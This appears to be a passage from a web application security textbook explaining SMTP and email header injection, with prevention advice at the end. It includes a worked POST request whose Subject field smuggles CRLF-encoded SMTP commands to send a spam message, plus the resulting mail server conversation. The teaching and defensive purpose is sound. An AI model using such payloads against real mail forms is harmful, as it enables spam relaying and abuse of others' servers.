Injecting into SMTP
Many applications contain a facility for users to submit messages via the application; for example, to report a problem to support personnel or provide feed-back about the web site. This facility is usually implemented by interfacing with a mail (or SMTP) server. Typically, user-supplied input will be inserted into the SMTP conversation that the application server conducts with the mail server. If an attacker can submit suitable crafted input that is not filtered or sanitized, he may be able to inject arbitrary STMP commands into this conversation.
In most cases, the application will enable you to specify the contents of the message and your own email address (which is inserted into the From field of the resulting email). You may also be able to specify the subject of the message and other details. Any relevant field that you control may be vulnerable to SMTP injection.
SMTP injection vulnerabilities are often exploited by spammers who scan the Internet for vulnerable mail forms and use these to generate large volumes of nuisance email.
Email Header Manipulation
Consider the form shown in Figure -1, which allows users to send feedback about the application.
Figure -1: A typical site feedback form
Here, users can specify a From address and the contents of the message. The application passes this input to the PHP mail() command, which constructs the email and performs the necessary SMTP conversation with its configured mail server. The mail generated is as follows:
To: admin@wahh-app.com
From: marcus@wahh-mail.com
Subject: Site problem
Confirm Order page doesn’t load
The PHP mail() command uses an additional_headers parameter to set the From address for the message. This parameter is also used to specify other headers, including Cc and Bcc, by separating each required header with a newline character. Hence, an attacker can cause the message to be sent to arbitrary recipients by injecting one of these headers into the From field, as illustrated in Figure -2.
Figure -2: An email header injection attack
SMTP Command Injection
In other cases, the application may perform the SMTP conversation itself, or may pass user-supplied input to a different component in order to do this. In this situation, it may be possible to inject arbitrary SMTP commands directly into this conversation, potentially taking full control of the messages being generated by the application.
For example, consider an application that uses requests of the following
form to submit site feedback:
POST feedback.php HTTP/1.1
Host: wahh-app.com
Content-Length: 56
From=daf@wahh-mail.com&Subject=Site+feedback&Message=foo
This causes the web application to perform an SMTP conversation with the following commands:
MAIL FROM: daf@wahh-mail.com
RCPT TO: feedback@wahh-app.com
DATA
From: daf@wahh-mail.com
To: feedback@wahh-app.com
Subject: Site feedback
foo
.
In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:
POST feedback.php HTTP/1.1
Host: wahh-app.com
Content-Length: 266
From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d
%0aMAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail
.com%0d%0aDATA%0d%0aFrom:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail
.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo
If the application is vulnerable, then this will result in the following SMTP conversation, which generates two different email messages, with the second being entirely within your control:
MAIL FROM: daf@wahh-mail.com
RCPT TO: feedback@wahh-app.com
DATA
From: daf@wahh-mail.com
To: feedback@wahh-app.com
Subject: Site+feedback
foo
.
MAIL FROM: mail@wahh-viagra.com
RCPT TO: john@wahh-mail.com
DATA
From: mail@wahh-viagra.com
To: john@wahh-mail.com
Subject: Cheap V1AGR4
Blah
.
foo
.
Finding SMTP Injection Flaws
To probe an application’s mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message. You should also test for each kind of attack, and you should perform each test case using both Windows and Unix-style newline characters.
Preventing SMTP Injection
SMTP injection vulnerabilities can usually be prevented by implementing rigorous validation of any user-supplied data that is passed to an email function or used in an SMTP conversation. Each item should be validated as strictly as possible given the purpose for which it is being used:
■ Email addresses should be checked against a suitable regular expression (which should of course reject any newline characters).
■ The message subject should not contain any newline characters, and may be subjected to a suitable length limit.
■ If the contents of a message are being used directly in an SMTP conversation, then lines containing just a single dot should be disallowed.
NEXT is..Injecting into LDAP…………………………………,,,,,,,,,,,,,,,,,,,,,,,
